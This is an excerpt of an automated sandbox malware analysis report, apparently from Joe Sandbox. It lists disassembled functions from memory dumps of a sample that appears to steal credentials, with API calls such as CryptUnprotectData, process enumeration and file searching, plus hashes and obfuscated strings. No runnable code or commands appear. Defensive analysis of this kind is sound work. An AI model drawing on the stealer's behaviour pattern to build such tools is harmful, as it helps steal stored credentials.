                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 433455689-1173974218
                                  • Opcode ID: 92789802fb1c3647de152d6dd6d75abb412a8a47fda39f882e69941d760b29ae
                                  • Instruction ID: 28bc96071e3302271ac626fce4c318ca9631c720603d4c626a8432de1485cc15
                                  • Opcode Fuzzy Hash: 92789802fb1c3647de152d6dd6d75abb412a8a47fda39f882e69941d760b29ae
                                  • Instruction Fuzzy Hash: 91123371A101189BDB19FB60DDA6EED73B9AF94300F4895F9B50E72091EE306B48CB52
                                  Function 012B1EBE Relevance: 9.1, Strings: 6, Instructions: 1624COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 15no$;w~$?ih$F]/9$^_ke$8G
                                  • API String ID: 0-657738206
                                  • Opcode ID: fe5226a5d1e458e7db98bb3302482fe9b1d9b8c210f1edf47291f4478e0cfc87
                                  • Instruction ID: bb7b5bbc5d813a45963b2c01ca5455ef3bdde474246873e22cb44f0375d9ded0
                                  • Opcode Fuzzy Hash: fe5226a5d1e458e7db98bb3302482fe9b1d9b8c210f1edf47291f4478e0cfc87
                                  • Instruction Fuzzy Hash: 9FB207F360C204AFE3046E2DEC8567AFBE9EFD4320F164A3DEAC487744E67558058696
                                  Function 00E6A210 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E6A23F
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00E64F3E,00000000,?), ref: 00E6A251
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E6A27A
                                  • LocalFree.KERNEL32(?,?,?,?,00E64F3E,00000000,?), ref: 00E6A28F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID: >O
                                  • API String ID: 4291131564-1870091082
                                  • Opcode ID: 523cc65547765c73c029aa6ce9f9b56bfe54e0c6ac45974d730a677a7fd746bc
                                  • Instruction ID: a194704ed3b16c238023ff8802f7a1e163bdb76066cfaaeff3fe6906ec74b37b
                                  • Opcode Fuzzy Hash: 523cc65547765c73c029aa6ce9f9b56bfe54e0c6ac45974d730a677a7fd746bc
                                  • Instruction Fuzzy Hash: F011D4B4640308AFEB15CF64D895FAA77B5EB88B04F208458FD15AB3D4C772A941CB50
                                  Function 012B6E28 Relevance: 7.9, Strings: 5, Instructions: 1641COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 4Kz$S|l3$b~/;$d,n_$q?C
                                  • API String ID: 0-690943083
                                  • Opcode ID: cf7ce04e17c533e62f8eb49a9ca74dafee3daf6479762248d78f609075bf8afa
                                  • Instruction ID: c9dff82ad214f2797dd3ead7dcbce09fa917ccee758839a620cf2939b3172a81
                                  • Opcode Fuzzy Hash: cf7ce04e17c533e62f8eb49a9ca74dafee3daf6479762248d78f609075bf8afa
                                  • Instruction Fuzzy Hash: E7B238F3A0C2049FE304AE2DEC8567AB7E9EFD4320F1A453DE6C4C7744EA7558058696
                                  Function 012BC052 Relevance: 7.8, Strings: 5, Instructions: 1595COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: *\w$KH>$`69o$%~$L~z
                                  • API String ID: 0-214446007
                                  • Opcode ID: a5699d0eb267e11fde6953f31edf66860a5298223a356e0de448f0572009921c
                                  • Instruction ID: 3f46b364fd70a4edd49322d7c9cec2a0c31f5461794af6030c6a4b6ab7be8c65
                                  • Opcode Fuzzy Hash: a5699d0eb267e11fde6953f31edf66860a5298223a356e0de448f0572009921c
                                  • Instruction Fuzzy Hash: 97B2F7F360C2149FE304AE2DEC8567AFBE9EF94720F16493DEAC4C7744EA3558018696
                                  Function 00ECF8D6 Relevance: 7.6, Strings: 6, Instructions: 123COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: \u$\u${${$}$}
                                  • API String ID: 0-582841131
                                  • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                  • Instruction ID: 1518636bd6fdd732a2a1ac1666e9233fa0a5331513738d1ea764c0d4406f942c
                                  • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                  • Instruction Fuzzy Hash: 15418E12E09BC9C5CB058B7445A02EEBFB26FD6210F6D42AEC49D2F382C775814BD3A5
                                  Function 00E6C920 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00E6C971
                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00E6C97C
                                  • lstrcat.KERNEL32(?,00E80B47), ref: 00E6CA43
                                  • lstrcat.KERNEL32(?,00E80B4B), ref: 00E6CA57
                                  • lstrcat.KERNEL32(?,00E80B4E), ref: 00E6CA78
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: 18088e51acd286212438e02009c2a73cd8c8c33b677847a6d390fc26fd1a50b3
                                  • Instruction ID: 11a54101b34a5c6f66016e01e300662c68fa5945a97c1a691320498449c6f727
                                  • Opcode Fuzzy Hash: 18088e51acd286212438e02009c2a73cd8c8c33b677847a6d390fc26fd1a50b3
                                  • Instruction Fuzzy Hash: 72414CB590421E9BDB24DFA0DD89BFEF7B8AB48344F1041A8E509B6284D7745A84CF91
                                  Function 00E76BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 00E76C0C
                                  • sscanf.NTDLL ref: 00E76C39
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00E76C52
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00E76C60
                                  • ExitProcess.KERNEL32 ref: 00E76C7A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$System$File$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 2533653975-0
                                  • Opcode ID: ebcb6aaf76b9fb6822c6d6c815f3ce09cf3b7535d0bf5438e2a1674eb20a3c3e
                                  • Instruction ID: e0f4b37777200f2d47eb1e1c8880cc45c904cdccf27139a1c1218ceca6e99d76
                                  • Opcode Fuzzy Hash: ebcb6aaf76b9fb6822c6d6c815f3ce09cf3b7535d0bf5438e2a1674eb20a3c3e
                                  • Instruction Fuzzy Hash: 2521EDB5D04209ABCF58EFE4E8459EEB7B5FF48304F048529E51AB3254EB349648CB64
                                  Function 00E672A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00E672AD
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E672B4
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00E672E1
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00E67304
                                  • LocalFree.KERNEL32(?), ref: 00E6730E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: 76133e4daf30e1c90c2ce46d56e89751ec8f51995020934f65579c472580ed08
                                  • Instruction ID: 9e359697ad3acf00ad841d99797ab82d08fb3d08a2f49e43b068ee94ba1f9799
                                  • Opcode Fuzzy Hash: 76133e4daf30e1c90c2ce46d56e89751ec8f51995020934f65579c472580ed08
                                  • Instruction Fuzzy Hash: AD011EB5A84308BBDB24DFE4DC46F9E77B8EB44B04F104554FB15BB2C8D6B0AA409B64
                                  Function 00E79790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E797AE
                                  • Process32First.KERNEL32(00E80ACE,00000128), ref: 00E797C2
                                  • Process32Next.KERNEL32(00E80ACE,00000128), ref: 00E797D7
                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 00E797EC
                                  • CloseHandle.KERNEL32(00E80ACE), ref: 00E7980A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: 68ef4cfd5e796cc2a2732bb858e89fdb04194aaa47c89caabb62b769c4c08415
                                  • Instruction ID: 24582b053f110e544b73eb793a3860505b00bfc9af234876eb70466d9d3e682d
                                  • Opcode Fuzzy Hash: 68ef4cfd5e796cc2a2732bb858e89fdb04194aaa47c89caabb62b769c4c08415
                                  • Instruction Fuzzy Hash: 9A0121B5A10208EBEB28DFA4D944BEDB7F9BF08700F108599E509E7284DB309B80CF51
                                  Function 00E84573 Relevance: 7.3, Strings: 2, Instructions: 4819COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
